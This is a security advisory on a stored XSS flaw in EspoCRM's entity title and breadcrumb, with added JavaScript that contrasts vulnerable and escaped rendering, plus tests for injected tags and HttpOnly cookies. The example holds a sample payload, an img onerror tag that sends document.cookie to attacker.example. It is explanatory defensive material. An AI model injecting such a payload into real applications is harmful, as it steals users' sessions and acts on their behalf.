Description
An issue was discovered in EspoCRM before 5.6.9. A stored cross-site scripting (XSS) vulnerability exists in the title and breadcrumb of a newly created entity that is visible to all users. A malicious user can inject JavaScript into these values; the script executes in the browser of anyone who visits the entity's link and can exfiltrate their cookies. Cookie theft via document.cookie succeeds only where the session cookie is not flagged HttpOnly, but even then the injected script runs with the victim's session and can act on their behalf within the application.
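The following JavaScript is an added illustration of the bug class and is not code from EspoCRM or from this advisory. It shows a stored record name interpolated unescaped into a breadcrumb/title template, the same template with output encoding, a check that flags any tag the template did not itself emit, and a check of whether a Set-Cookie header leaves the session readable to injected script. The function names, the attacker.example host and the PHPSESSID cookie name are assumptions chosen for the example.

```javascript
// Added example (not EspoCRM code): stored XSS through an unescaped record name
// rendered into a page title and breadcrumb, and the hardened equivalent.

// Constructed sample: an attacker saved this string as the "name" of a new record.
const ATTACKER_NAME =
  '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">Acme';

// Escape the five characters that matter in HTML text and quoted-attribute contexts.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Vulnerable pattern: the stored value is concatenated straight into markup that a
// view later assigns to innerHTML. entityType is application-controlled here.
function renderHeaderVulnerable(entityType, record) {
  return `<div class="breadcrumb"><a href="#${entityType}">${entityType}</a> &raquo; ${record.name}</div>`
       + `<h1 class="title">${record.name}</h1>`;
}

// Hardened pattern: every value is escaped at the point it enters HTML.
function renderHeaderSafe(entityType, record) {
  const name = escapeHtml(record.name);
  const type = escapeHtml(entityType);
  return `<div class="breadcrumb"><a href="#${type}">${type}</a> &raquo; ${name}</div>`
       + `<h1 class="title">${name}</h1>`;
}

// Test-time check: collect the tag names present in rendered markup and report any
// that the template itself does not emit. A non-empty result means stored data
// reached the DOM as live markup rather than as text.
const ALLOWED_TAGS = ['a', 'div', 'h1'];
function injectedTags(html, allowed = ALLOWED_TAGS) {
  const found = new Set();
  for (const m of html.matchAll(/<\/?([a-z][a-z0-9]*)/gi)) found.add(m[1].toLowerCase());
  return [...found].filter((t) => !allowed.includes(t)).sort();
}

// Cookie theft via document.cookie only works if the session cookie is readable from
// script. Given a Set-Cookie header value, report whether it lacks HttpOnly.
function cookieReadableByScript(setCookie) {
  const attrs = setCookie.split(';').slice(1).map((a) => a.trim().toLowerCase());
  return !attrs.includes('httponly');
}

// Stand-alone run: show both renderings and the checks side by side.
const record = { name: ATTACKER_NAME };
console.log('vulnerable injected tags:', injectedTags(renderHeaderVulnerable('Account', record)));
console.log('safe injected tags:     ', injectedTags(renderHeaderSafe('Account', record)));
console.log('cookie readable (no HttpOnly):', cookieReadableByScript('PHPSESSID=abc; Path=/; Secure'));
console.log('cookie readable (HttpOnly):   ', cookieReadableByScript('PHPSESSID=abc; Path=/; HttpOnly; Secure'));
```

The injectedTags check is the kind of assertion worth adding to a view's unit tests: render a record whose name contains markup and require that no tag beyond the template's own appears in the output. The cookie check is a reminder that HttpOnly limits the cookie-theft consequence but does not remove the XSS, since the script still runs inside the victim's authenticated session.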
Remediation
Upgrade to EspoCRM 5.6.9 or later.
References